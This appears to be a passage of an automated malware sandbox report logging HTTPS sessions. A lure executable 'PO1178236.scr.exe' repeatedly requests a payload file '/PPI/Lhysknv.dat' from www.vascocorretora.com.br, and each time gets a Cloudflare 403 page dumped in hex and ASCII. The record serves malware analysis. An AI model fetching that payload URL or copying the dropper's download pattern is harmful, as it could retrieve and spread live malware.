        Expires: Thu, 09 Jan 2025 07:36:20 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dheu%2Bt%2B%2B%2FkHxiSxyI2uAkFt9iZYzNBzVvZ9hBTjkcDWgnatjpfaDHFNgCWPVhB%2FJuBVOuNwYc8HnKSIT9IotV5vivJQYCSa45eP5f%2FNu9RZgxyeSrndf0geswkKt9tKdD%2FXDWIfgVUKqMnmh"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c11b2d8a42e7-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1695&min_rtt=1691&rtt_var=643&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1689814&cwnd=242&unsent_bytes=0&cid=26081c4dc488848f&ts=131&x=0"
        2025-01-09 07:36:05 UTC356INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:05 UTC1369INData Raw: 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
        Data Ascii: Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="wi
        2025-01-09 07:36:05 UTC1369INData Raw: 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d
        Data Ascii: ection cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>...
        2025-01-09 07:36:05 UTC1369INData Raw: 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 31 62 32 64 38 61 34 32 65 37 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a
        Data Ascii: m:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c11b2d8a42e7</strong></span> <span class="cf-footer-separator sm:
        2025-01-09 07:36:05 UTC1006INData Raw: 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 31 62 32 64 38 61 34 32 65 37 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 32 4e 53 34 77 4d 44 41 77 4d 44 41 3d
        Data Ascii: > window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c11b2d8a42e7',t:'MTczNjQwODE2NS4wMDAwMDA=
        2025-01-09 07:36:05 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        16192.168.2.949723188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:06 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:06 UTC1009INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:06 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:21 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fZcpriirF%2B0xYBPEn3hSmSWkqlxUnZFMmiE8UA9dK1DC%2BF7oLK8nQzo3zYEvr6H66KPT%2FngbIWkI%2FfADXwObtHNDgIizses45L96QgOG2nV0MPzgJLv6Gm3TkVLDtmrBCjFZFcVNtrYr%2FkDX"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c11f0fd64219-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1719&min_rtt=1719&rtt_var=646&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1692753&cwnd=193&unsent_bytes=0&cid=b723378ce34248a9&ts=162&x=0"
        2025-01-09 07:36:06 UTC360INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:06 UTC1369INData Raw: 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d
        Data Ascii: udflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=
        2025-01-09 07:36:06 UTC1369INData Raw: 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63
        Data Ascii: on cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.c
        2025-01-09 07:36:06 UTC1369INData Raw: 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 31 66 30 66 64 36 34 32 31 39 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64
        Data Ascii: xt-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c11f0fd64219</strong></span> <span class="cf-footer-separator sm:hidd
        2025-01-09 07:36:06 UTC1002INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 31 66 30 66 64 36 34 32 31 39 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 32 4e 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c11f0fd64219',t:'MTczNjQwODE2Ni4wMDAwMDA='};v
        2025-01-09 07:36:06 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        17192.168.2.949724188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:06 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:06 UTC1003INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:06 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:21 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i1NeiHiS1AasbsnxUbnbOaIvGRylhum1XNZiv%2Bt8gvTi1yIcauR7CudNpBVLKpdC1ctRLQYD6y3URWfXxD4EaCFOXyaFYOEOdyi4CSSkLkWoFv%2FYfB81vdgK3oprW0QSvpmJJniBgVrzS5wd"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1232d484346-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1575&rtt_var=604&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1790312&cwnd=252&unsent_bytes=0&cid=f53a0d8968928bd3&ts=175&x=0"
        2025-01-09 07:36:06 UTC366INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:06 UTC1369INData Raw: 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65
        Data Ascii: e</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device
        2025-01-09 07:36:06 UTC1369INData Raw: 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63 68 61
        Data Ascii: highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha
        2025-01-09 07:36:06 UTC1369INData Raw: 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 32 33 32 64 34 38 34 33 34 36 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62
        Data Ascii: t border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1232d484346</strong></span> <span class="cf-footer-separator sm:hidden">&b
        2025-01-09 07:36:06 UTC996INData Raw: 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 32 33 32 64 34 38 34 33 34 36 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 32 4e 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64
        Data Ascii: ._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1232d484346',t:'MTczNjQwODE2Ni4wMDAwMDA='};var a=d
        2025-01-09 07:36:06 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        18192.168.2.949725188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:07 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:07 UTC999INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:07 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:22 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wvSTZxB1JVBFZgu0kPOGlz3dprBGnEvCb4hwraMVa4I3cQdUq6SUkyeEhfKk9QJMCKAfzaF79eE2fLqr3y2hmJ4PTpYrmRbJszfasvYR3zuiMfPdaUqds0MoWnopJAan9fzZTxBcpgiJfk7o"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c126fa7a43f3-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2377&min_rtt=2376&rtt_var=894&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1222780&cwnd=213&unsent_bytes=0&cid=e1661285aab55ced&ts=140&x=0"
        2025-01-09 07:36:07 UTC370INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
